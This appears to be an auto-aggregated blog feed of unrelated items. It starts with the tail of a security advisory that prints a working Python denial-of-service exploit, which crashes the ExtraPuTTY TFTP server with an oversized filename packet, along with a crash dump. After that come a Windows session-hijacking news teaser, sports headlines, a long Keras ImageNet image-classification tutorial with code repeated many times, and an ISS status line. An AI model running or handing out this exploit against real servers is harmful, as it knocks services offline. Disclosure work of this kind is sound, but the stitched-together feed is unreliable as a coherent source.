Server, run below Python exploit. Then, BOOM (100c.30c): Access violation - code c0000005 (first/second chance not available) *** ERROR: Symbol file could not be found. Defaulted to export symbols for kernel32.dll - eax=00000000 ebx=0929ee98 ecx=00000174 edx=7efefeff esi=00000002 edi=00000000 eip=77b4015d esp=0929ee48 ebp=0929eee4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246 ntdll!ZwWaitForMultipleObjects+0x15: Exploit/POC: ============= import socket print "ExtraPuTTY v029_RC2 TFTP Server" print "Remote Denial Of Service 0day Exploit" print "John Page AKA hyp3rlinx\n" TARGET=raw_input("[IP]>") TYPE=int(raw_input("[Select DOS Type: Read=1, Write=2]>")) CRASH="A"*2000 PORT = 69 if TYPE==1: PAYLOAD = "\x00\x01" PAYLOAD += CRASH + "\x00" PAYLOAD += "netascii\x00" elif TYPE==2: PAYLOAD = "\x00\x02" PAYLOAD += CRASH + "\x00" PAYLOAD += "netascii\x00" try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.sendto("\x00\x01\TEST\x00\netascii\x00", (TARGET, PORT)) recv = s.recvfrom(255) if recv != None: print "Crashing ExtraPuTTY TFTP server at : %s" %(TARGET) s.sendto(PAYLOAD, (TARGET, PORT)) except Exception: print 'Server not avail, try later' s.close() Network Access: =============== Remote Severity: ========= Medium Disclosure Timeline: =============================== Vendor Notification: No reply March 20, 2017 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx

Source: Gmail -> IFTTT-> Blogger

Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password

You may be aware of the fact that a local Windows user with system rights and permissions can reset the password for other users, but did you know that a local user can also hijack other users' session, including domain admin/system user, without knowing their passwords? Alexander Korznikov, an Israeli security researcher, has recently demonstrated that a local privileged user can even hijack


from The Hacker News http://ift.tt/2mN2NwL
via IFTTT

Orioles Interview: Pedro Alvarez covers adjusting to outfield, waiting for contract in offseason; listen now in ESPN App (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

NFL Free Agency: Former Cowboys CB Brandon Carr signs 1-year, $6M deal with Ravens, includes 3 team options for 2018-20 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ImageNet: VGGNet, ResNet, Inception, and Xception with Keras

A few months ago I wrote a tutorial on how to classify images using Convolutional Neural Networks (specifically, VGG16) pre-trained on the ImageNet dataset with Python and the Keras deep learning library.

The pre-trained networks inside of Keras are capable of recognizing 1,000 different object categories, similar to objects we encounter in our day-to-day lives with high accuracy.

Back then, the pre-trained ImageNet models were separate from the core Keras library, requiring us to clone a free-standing GitHub repo and then manually copy the code into our projects.

This solution worked well enough; however, since my original blog post was published, the pre-trained networks (VGG16, VGG19, ResNet50, Inception V3, and Xception) have been fully integrated into the Keras core (no need to clone down a separate repo anymore) — these implementations can be found inside the applications sub-module.

Because of this, I’ve decided to create a new, updated tutorial that demonstrates how to utilize these state-of-the-art networks in your own classification projects.

Specifically, we’ll create a special Python script that can load any of these networks using either a TensorFlow or Theano backend, and then classify your own custom input images.

To learn more about classifying images with VGGNet, ResNet, Inception, and Xception, just keep reading.

Looking for the source code to this post?
Jump right to the downloads section.

VGGNet, ResNet, Inception, and Xception with Keras

In the first half of this blog post I’ll briefly discuss the VGG, ResNet, Inception, and Xception network architectures included in the Keras library.

We’ll then create a custom Python script using Keras that can load these pre-trained network architectures from disk and classify your own input images.

Finally, we’ll review the results of these classifications on a few sample images.

State-of-the-art deep learning image classifiers in Keras

Keras ships out-of-the-box with five Convolutional Neural Networks that have been pre-trained on the ImageNet dataset:

  1. VGG16
  2. VGG19
  3. ResNet50
  4. Inception V3
  5. Xception

Let’s start with a overview of the ImageNet dataset and then move into a brief discussion of each network architecture.

What is ImageNet?

ImageNet is formally a project aimed at (manually) labeling and categorizing images into almost 22,000 separate object categories for the purpose of computer vision research.

However, when we hear the term “ImageNet” in the context of deep learning and Convolutional Neural Networks, we are likely referring to the ImageNet Large Scale Visual Recognition Challenge, or ILSVRC for short.

The goal of this image classification challenge is to train a model that can correctly classify an input image into 1,000 separate object categories.

Models are trained on ~1.2 million training images with another 50,000 images for validation and 100,000 images for testing.

These 1,000 image categories represent object classes that we encounter in our day-to-day lives, such as species of dogs, cats, various household objects, vehicle types, and much more. You can find the full list of object categories in the ILSVRC challenge here.

When it comes to image classification, the ImageNet challenge is the de facto benchmark for computer vision classification algorithms — and the leaderboard for this challenge has been dominated by Convolutional Neural Networks and deep learning techniques since 2012.

The state-of-the-art pre-trained networks included in the Keras core library represent some of the highest performing Convolutional Neural Networks on the ImageNet challenge over the past few years. These networks also demonstrate a strong ability to generalize to images outside the ImageNet dataset via transfer learning, such as feature extraction and fine-tuning.

VGG16 and VGG19

Figure 1: A visualization of the VGG architecture (source).

The VGG network architecture was introduced by Simonyan and Zisserman in their 2014 paper, Very Deep Convolutional Networks for Large Scale Image Recognition.

This network is characterized by its simplicity, using only 3×3 convolutional layers stacked on top of each other in increasing depth. Reducing volume size is handled by max pooling. Two fully-connected layers, each with 4,096 nodes are then followed by a softmax classifier (above).

The “16” and “19” stand for the number of weight layers in the network (columns D and E in Figure 2 below):

Figure 2: Table 1 of Very Deep Convolutional Networks for Large Scale Image Recognition, Simonyan and Zisserman (2014).

In 2014, 16 and 19 layer networks were considered very deep (although we now have the ResNet architecture which can be successfully trained at depths of 50-200 for ImageNet and over 1,000 for CIFAR-10).

Simonyan and Zisserman found training VGG16 and VGG19 challenging (specifically regarding convergence on the deeper networks), so in order to make training easier, they first trained smaller versions of VGG with less weight layers (columns A and C) first.

The smaller networks converged and were then used as initializations for the larger, deeper networks — this process is called pre-training.

While making logical sense, pre-training is a very time consuming, tedious task, requiring an entire network to be trained before it can serve as an initialization for a deeper network.

We no longer use pre-training (in most cases) and instead prefer Xaiver/Glorot initialization or MSRA initialization (sometimes called He et al. initialization from the paper, Delving Deep into Rectifiers: Surpassing Human-Level Performance on ImageNet Classification). You can read more about the importance of weight initialization and the convergence of deep neural networks inside All you need is a good init, Mishkin and Matas (2015).

Unfortunately, there are two major drawbacks with VGGNet:

  1. It is painfully slow to train.
  2. The network architecture weights themselves are quite large (in terms of disk/bandwidth).

Due to its depth and number of fully-connected nodes, VGG is over 533MB for VGG16 and 574MB for VGG16. This makes deploying VGG a tiresome task.

We still use VGG in many deep learning image classification problems; however, smaller network architectures are often more desirable (such as SqueezeNet, GoogLeNet, etc.).

ResNet

Unlike traditional sequential network architectures such as AlexNet, OverFeat, and VGG, ResNet is instead a form of “exotic architecture” that relies on micro-architecture modules (also called “network-in-network architectures”).

The term micro-architecture refers to the set of “building blocks” used to construct the network. A collection of micro-architecture building blocks (along with your standard CONV, POOL, etc. layers) leads to the macro-architecture (i.e,. the end network itself).

First introduced by He et al. in their 2015 paper, Deep Residual Learning for Image Recognition, the ResNet architecture has become a seminal work, demonstrating that extremely deep networks can be trained using standard SGD (and a reasonable initialization function) through the use of residual modules:

Figure 3: The residual module in ResNet as originally proposed by He et al. in 2015.

Further accuracy can be obtained by updating the residual module to use identify mappings, as demonstrated in their 2016 followup publication, Identity Mappings in Deep Residual Networks:

Figure 4: (Left) The original residual module. (Right) The updated residual module using pre-activation.

That said, keep in mind that the ResNet50 (as in 50 weight layers) implementation in the Keras core is based on the former 2015 paper.

Even though ResNet is much deeper than VGG16 and VGG19, the model size is actually substantially smaller due to the usage of global average pooling rather than fully-connected layers — this reduces the model size down to 102MB for ResNet50.

Inception V3

The “Inception” micro-architecture was first introduced by Szegedy et al. in their 2014 paper, Going Deeper with Convolutions:

Figure 5: The original Inception module used in GoogLeNet.

The goal of the inception module is to act as a “multi-level feature extractor” by computing 1×1, 3×3, and 5×5 convolutions within the same module of the network — the output of these filters are then stacked along the channel dimension and before being fed into the next layer in the network.

The original incarnation of this architecture was called GoogLeNet, but subsequent manifestations have simply been called Inception vN where N refers to the version number put out by Google.

The Inception V3 architecture included in the Keras core comes from the later publication by Szegedy et al., Rethinking the Inception Architecture for Computer Vision (2015) which proposes updates to the inception module to further boost ImageNet classification accuracy.

The weights for Inception V3 are smaller than both VGG and ResNet, coming in at 96MB.

Xception

Figure 6: The Xception architecture.

Xception was proposed by none other than François Chollet himself, the creator and chief maintainer of the Keras library.

Xception is an extension of the Inception architecture which replaces the standard Inception modules with depthwise separable convolutions.

The original publication, Xception: Deep Learning with Depthwise Separable Convolutions can be found here.

Xception sports the smallest weight serialization at only 91MB.

What about SqueezeNet?

Figure 7: The “fire” module in SqueezeNet, consisting of a “squeeze” and an “expand”. (Iandola et al., 2016).

For what it’s worth, the SqueezeNet architecture can obtain AlexNet-level accuracy (~57% rank-1 and ~80% rank-5) at only 4.9MB through the usage of “fire” modules that “squeeze” and “expand”.

While leaving a small footprint, SqueezeNet can also be very tricky to train.

That said, I demonstrate how to train SqueezeNet from scratch on the ImageNet dataset inside my upcoming book, Deep Learning for Computer Vision with Python.

Classifying images with VGGNet, ResNet, Inception, and Xception with Python and Keras

Let’s learn how to classify images with pre-trained Convolutional Neural Networks using the Keras library.

Open up a new file, name it

classify_image.py
 , and insert the following code:
# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

Lines 2-13 import our required Python packages. As you can see, most of the packages are part of the Keras library.

Specifically, Lines 2-6 handle importing the Keras implementations of ResNet50, Inception V3, Xception, VGG16, and VGG19, respectively.

Please note that the Xception network is compatible only with the TensorFlow backend (the class will throw an error if you try to instantiate it with a Theano backend).

Line 7 gives us access to the

imagenet_utils
  sub-module, a handy set of convenience functions that will make pre-processing our input images and decoding output classifications easier.

The remainder of the imports are other helper functions, followed by NumPy for numerical processing and

cv2
  for our OpenCV bindings.

Next, let’s parse our command line arguments:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

We’ll require only a single command line argument,

--image
 , which is the path to our input image that we wish to classify.

We’ll also accept an optional command line argument,

--model
 , a string that specifies which pre-trained Convolutional Neural Network we would like to use — this value defaults to
vgg16
  for the VGG16 network architecture.

Given that we accept the name of our pre-trained network via a command line argument, we need to define a Python dictionary that maps the model names (strings) to their actual Keras classes:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# esnure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

Lines 25-31 defines our

MODELS
  dictionary which maps a model name string to the corresponding class.

If the

--model
  name is not found inside
MODELS
 , we’ll raise an
AssertionError
  (Lines 34-36).

A Convolutional Neural Network takes an image as an input and then returns a set of probabilities corresponding to the class labels as output.

Typical input image sizes to a Convolutional Neural Network trained on ImageNet are 224×224227×227256×256, and 299×299; however, you may see other dimensions as well.

VGG16, VGG19, and ResNet all accept 224×224 input images while Inception V3 and Xception require 299×299 pixel inputs, as demonstrated by the following code block:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# esnure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

Here we initialize our

inputShape
  to be 224×224 pixels. We also initialize our
preprocess
  function to be the standard
preprocess_input
  from Keras (which performs mean subtraction).

However, if we are using Inception or Xception, we need to set the

inputShape
  to 299×299 pixels, followed by updating
preprocess
  to use a separate pre-processing function that performs a different type of scaling.

The next step is to load our pre-trained network architecture weights from disk and instantiate our model:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# esnure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

# load our the network weights from disk (NOTE: if this is the
# first time you are running this script for a given network, the
# weights will need to be downloaded first -- depending on which
# network you are using, the weights can be 90-575MB, so be
# patient; the weights will be cached and subsequent runs of this
# script will be *much* faster)
print("[INFO] loading {}...".format(args["model"]))
Network = MODELS[args["model"]]
model = Network(weights="imagenet")

Line 58 uses the

MODELS
  dictionary along with the
--model
  command line argument to grab the correct
Network
  class.

The Convolutional Neural Network is then instantiated on Line 59 using the pre-trained ImageNet weights;

Note: Weights for VGG16 and VGG19 are > 500MB. ResNet weights are ~100MB, while Inception and Xception weights are between 90-100MB. If this is the first time you are running this script for a given network, these weights will be (automatically) downloaded and cached to your local disk. Depending on your internet speed, this may take awhile. However, once the weights are downloaded, they will not need to be downloaded again, allowing subsequent runs of

classify_image.py
  to be much faster.

Our network is now loaded and ready to classify an image — we just need to prepare this image for classification:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# esnure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

# load our the network weights from disk (NOTE: if this is the
# first time you are running this script for a given network, the
# weights will need to be downloaded first -- depending on which
# network you are using, the weights can be 90-575MB, so be
# patient; the weights will be cached and subsequent runs of this
# script will be *much* faster)
print("[INFO] loading {}...".format(args["model"]))
Network = MODELS[args["model"]]
model = Network(weights="imagenet")

# load the input image using the Keras helper utility while ensuring
# the image is resized to `inputShape`, the required input dimensions
# for the ImageNet pre-trained network
print("[INFO] loading and pre-processing image...")
image = load_img(args["image"], target_size=inputShape)
image = img_to_array(image)

# our input image is now represented as a NumPy array of shape
# (inputShape[0], inputShape[1], 3) however we need to expand the
# dimension by making the shape (1, inputShape[0], inputShape[1], 3)
# so we can pass it through thenetwork
image = np.expand_dims(image, axis=0)

# pre-process the image using the appropriate function based on the
# model that has been loaded (i.e., mean subtraction, scaling, etc.)
image = preprocess(image)

Line 65 loads our input image from disk using the supplied

inputShape
  to resize the width and height of the image.

Line 66 converts the image from a PIL/Pillow instance to a NumPy array.

Our input image is now represented as a NumPy array with the shape

(inputShape[0], inputShape[1], 3)
 .

However, we typically train/classify images in batches with Convolutional Neural Networks, so we need to add an extra dimension to the array via

np.expand_dims
  on Line 72.

After calling

np.expand_dims
  the
image
  has the shape
(1, inputShape[0], inputShape[1], 3)
 . Forgetting to add this extra dimension will result in an error when you call
.predict
  of the
model
 .

Lastly, Line 76 calls the appropriate pre-processing function to perform mean subtraction/scaling.

We are now ready to pass our image through the network and obtain the output classifications:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# esnure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

# load our the network weights from disk (NOTE: if this is the
# first time you are running this script for a given network, the
# weights will need to be downloaded first -- depending on which
# network you are using, the weights can be 90-575MB, so be
# patient; the weights will be cached and subsequent runs of this
# script will be *much* faster)
print("[INFO] loading {}...".format(args["model"]))
Network = MODELS[args["model"]]
model = Network(weights="imagenet")

# load the input image using the Keras helper utility while ensuring
# the image is resized to `inputShape`, the required input dimensions
# for the ImageNet pre-trained network
print("[INFO] loading and pre-processing image...")
image = load_img(args["image"], target_size=inputShape)
image = img_to_array(image)

# our input image is now represented as a NumPy array of shape
# (inputShape[0], inputShape[1], 3) however we need to expand the
# dimension by making the shape (1, inputShape[0], inputShape[1], 3)
# so we can pass it through thenetwork
image = np.expand_dims(image, axis=0)

# pre-process the image using the appropriate function based on the
# model that has been loaded (i.e., mean subtraction, scaling, etc.)
image = preprocess(image)

# classify the image
print("[INFO] classifying image with '{}'...".format(args["model"]))
preds = model.predict(image)
P = imagenet_utils.decode_predictions(preds)

# loop over the predictions and display the rank-5 predictions +
# probabilities to our terminal
for (i, (imagenetID, label, prob)) in enumerate(P[0]):
        print("{}. {}: {:.2f}%".format(i + 1, label, prob * 100))

A call to

.predict
  on Line 80 returns the predictions from the Convolutional Neural Network.

Given these predictions, we pass them into the ImageNet utility function

.decode_predictions
  to give us a list of ImageNet class label IDs, “human-readable” labels, and the probability associated with the labels.

The top-5 predictions (i.e., the labels with the largest probabilities) are then printed to our terminal on Lines 85 and 86.

The last thing we’ll do here before we close out our example is load our input image from disk via OpenCV, draw the #1 prediction on the image, and finally display the image to our screen:

# import the necessary packages
from keras.applications import ResNet50
from keras.applications import InceptionV3
from keras.applications import Xception # TensorFlow ONLY
from keras.applications import VGG16
from keras.applications import VGG19
from keras.applications import imagenet_utils
from keras.applications.inception_v3 import preprocess_input
from keras.preprocessing.image import img_to_array
from keras.preprocessing.image import load_img
import numpy as np
import argparse
import cv2

# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--image", required=True,
        help="path to the input image")
ap.add_argument("-model", "--model", type=str, default="vgg16",
        help="name of pre-trained network to use")
args = vars(ap.parse_args())

# define a dictionary that maps model names to their classes
# inside Keras
MODELS = {
        "vgg16": VGG16,
        "vgg19": VGG19,
        "inception": InceptionV3,
        "xception": Xception, # TensorFlow ONLY
        "resnet": ResNet50
}

# esnure a valid model name was supplied via command line argument
if args["model"] not in MODELS.keys():
        raise AssertionError("The --model command line argument should "
                "be a key in the `MODELS` dictionary")

# initialize the input image shape (224x224 pixels) along with
# the pre-processing function (this might need to be changed
# based on which model we use to classify our image)
inputShape = (224, 224)
preprocess = imagenet_utils.preprocess_input

# if we are using the InceptionV3 or Xception networks, then we
# need to set the input shape to (299x299) [rather than (224x224)]
# and use a different image processing function
if args["model"] in ("inception", "xception"):
        inputShape = (299, 299)
        preprocess = preprocess_input

# load our the network weights from disk (NOTE: if this is the
# first time you are running this script for a given network, the
# weights will need to be downloaded first -- depending on which
# network you are using, the weights can be 90-575MB, so be
# patient; the weights will be cached and subsequent runs of this
# script will be *much* faster)
print("[INFO] loading {}...".format(args["model"]))
Network = MODELS[args["model"]]
model = Network(weights="imagenet")

# load the input image using the Keras helper utility while ensuring
# the image is resized to `inputShape`, the required input dimensions
# for the ImageNet pre-trained network
print("[INFO] loading and pre-processing image...")
image = load_img(args["image"], target_size=inputShape)
image = img_to_array(image)

# our input image is now represented as a NumPy array of shape
# (inputShape[0], inputShape[1], 3) however we need to expand the
# dimension by making the shape (1, inputShape[0], inputShape[1], 3)
# so we can pass it through thenetwork
image = np.expand_dims(image, axis=0)

# pre-process the image using the appropriate function based on the
# model that has been loaded (i.e., mean subtraction, scaling, etc.)
image = preprocess(image)

# classify the image
print("[INFO] classifying image with '{}'...".format(args["model"]))
preds = model.predict(image)
P = imagenet_utils.decode_predictions(preds)

# loop over the predictions and display the rank-5 predictions +
# probabilities to our terminal
for (i, (imagenetID, label, prob)) in enumerate(P[0]):
        print("{}. {}: {:.2f}%".format(i + 1, label, prob * 100))

# load the image via OpenCV, draw the top prediction on the image,
# and display the image to our screen
orig = cv2.imread(args["image"])
(imagenetID, label, prob) = P[0][0]
cv2.putText(orig, "Label: {}, {:.2f}%".format(label, prob * 100),
        (10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (0, 0, 255), 2)
cv2.imshow("Classification", orig)
cv2.waitKey(0)

To see our pre-trained ImageNet networks in action, take a look at the next section.

VGGNet, ResNet, Inception, and Xception classification results

All examples in this blog post were gathered using Keras >= 2.0 and a TensorFlow backend. If you are using TensorFlow, make sure you are using version >= 1.0, otherwise you will run into errors. I’ve also tested this script with the Theano backend and confirmed that the implementation will work with Theano as well.

Once you have TensorFlow/Theano and Keras installed, make sure you download the source code + example images to this blog post using the “Downloads” section at the bottom of the tutorial.

From there, let’s try classifying an image with VGG16:

$ python classify_image.py --image images/soccer_ball.jpg --model vgg16

Figure 8: Classifying a soccer ball using VGG16 pre-trained on the ImageNet database using Keras (source).

Taking a look at the output, we can see VGG16 correctly classified the image as “soccer ball” with 93.43% accuracy.

To use VGG19, we simply need to change the

--network
  command line argument:
$ python classify_image.py --image images/bmw.png --model vgg19

Figure 9: Classifying a vehicle as “convertible” using VGG19 and Keras (source).

VGG19 is able to correctly classify the the input image as “convertible” with a probability of 91.76%. However, take a look at the other top-5 predictions: sports car with 4.98% probability (which the car is), limousine at 1.06% (incorrect, but still reasonable), and “car wheel” at 0.75% (also technically correct since there are car wheels in the image).

We can see similar levels of top-5 accuracy in the following example where we use the pre-trained ResNet architecture:

$ python classify_image.py --image images/clint_eastwood.jpg --model resnet

Figure 10: Using ResNet pre-trained on ImageNet with Keras + Python (source).

ResNet correctly classifies this image of Clint Eastwood holding a gun as “revolver” with 69.79% accuracy. It’s also interesting to see “rifle” at 7.74% and “assault rifle” at 5.63% included in the top-5 predictions as well. Given the viewing angle of the revolver and the substantial length of the barrel (for a handgun) it’s easy to see how a Convolutional Neural Network would also return higher probabilities for a rifle as well.

This next example attempts to classify the species of dog using ResNet:

$ python classify_image.py --image images/jemma.png --model resnet

Figure 11: Classifying dog species using ResNet, Keras, and Python.

The species of dog is correctly identified as “beagle” with 94.48% confidence.

I then tried classifying the following image of Johnny Depp from the Pirates of the Caribbean franchise:

$ python classify_image.py --image images/boat.png --model inception

Figure 12: Classifying a ship wreck with ResNet pre-trained on ImageNet with Keras (source).

While there is indeed a “boat” class in ImageNet, it’s interesting to see that the Inception network was able to correctly identify the scene as a “(ship) wreck” with 96.29% probability. All other predicted labels, including “seashore”, “canoe”, “paddle”, and “breakwater” are all relevant, and in some cases absolutely correct as well.

For another example of the Inception network in action, I took a photo of the couch sitting in my office:

$ python classify_image.py --image images/office.png --model inception

Figure 13: Recognizing various objects in an image with Inception V3, Python, and Keras.

Inception correctly predicts there is a “table lamp” in the image with 69.68% confidence. The other top-5 predictions are also dead-on, including a “studio couch”“window shade” (far right of the image, barely even noticeable), “lampshade”, and “pillow”.

In the context above, Inception wasn’t even used as an object detector, but it was still able to classify all parts of the image within its top-5 predictions. It’s no wonder that Convolutional Neural Networks make for excellent object detectors!

Moving on to Xception:

$ python classify_image.py --image images/scotch.png --model xception

Figure 14: Using the Xception network architecture to classify an image (source).

Here we have an image of scotch barrels, specifically my favorite scotch, Lagavulin. Xception correctly classifies this image as “barrels”.

This last example was classified using VGG16:

$ python classify_image.py --image images/tv.png --model vgg16

Figure 15: VGG16 pre-trained on ImageNet with Keras.

The image itself was captured a few months ago as I was finishing up The Witcher III: The Wild Hunt (easily in my top-3 favorite games of all time). The first prediction by VGG16 is “home theatre” — a reasonable prediction given that there is a “television/monitor” in the top-5 predictions as well.

As you can see from the examples in this blog post, networks pre-trained on the ImageNet dataset are capable of recognizing a variety of common day-to-day objects. I hope that you can use this code in your own projects!

What now?

Congratulations!

You can now recognize 1,000 separate object categories from the ImageNet dataset using pre-trained state-of-the-art Convolutional Neural Networks.

…but what if you wanted to train your own custom deep learning networks from scratch?

How would you go about it?

Do you know where to start?

Let me help:

Whether this is the first time you’ve worked with machine learning and neural networks or you’re already a seasoned deep learning practitioner, my new book is engineered from the ground up to help you reach deep learning expert status.

Summary

In today’s blog post we reviewed the five Convolutional Neural Networks pre-trained on the ImageNet dataset inside the Keras library:

  1. VGG16
  2. VGG19
  3. ResNet50
  4. Inception V3
  5. Xception

I then demonstrated how to use each of these architectures to classify your own input images using the Keras library and the Python programming language.

If you are interested in learning more about deep learning and Convolutional Neural Networks (and how to train your own networks from scratch), be sure to take a look at my upcoming book, Deep Learning for Computer Vision with Python, available for pre-order now.

Downloads:

If you would like to download the code and images used in this post, please enter your email address in the form below. Not only will you get a .zip of the code, I’ll also send you a FREE 11-page Resource Guide on Computer Vision and Image Search Engines, including exclusive techniques that I don’t post on this blog! Sound good? If so, enter your email address and I’ll send you the code immediately!

The post ImageNet: VGGNet, ResNet, Inception, and Xception with Keras appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2mHUbXm
via IFTTT

ISS Daily Summary Report – 3/19/2017

Dragon was successfully released by the Space Station Remote Manipulator System (SSRMS) and is on its way to re-entry.  Splash down is scheduled for 9:50 am CDT.

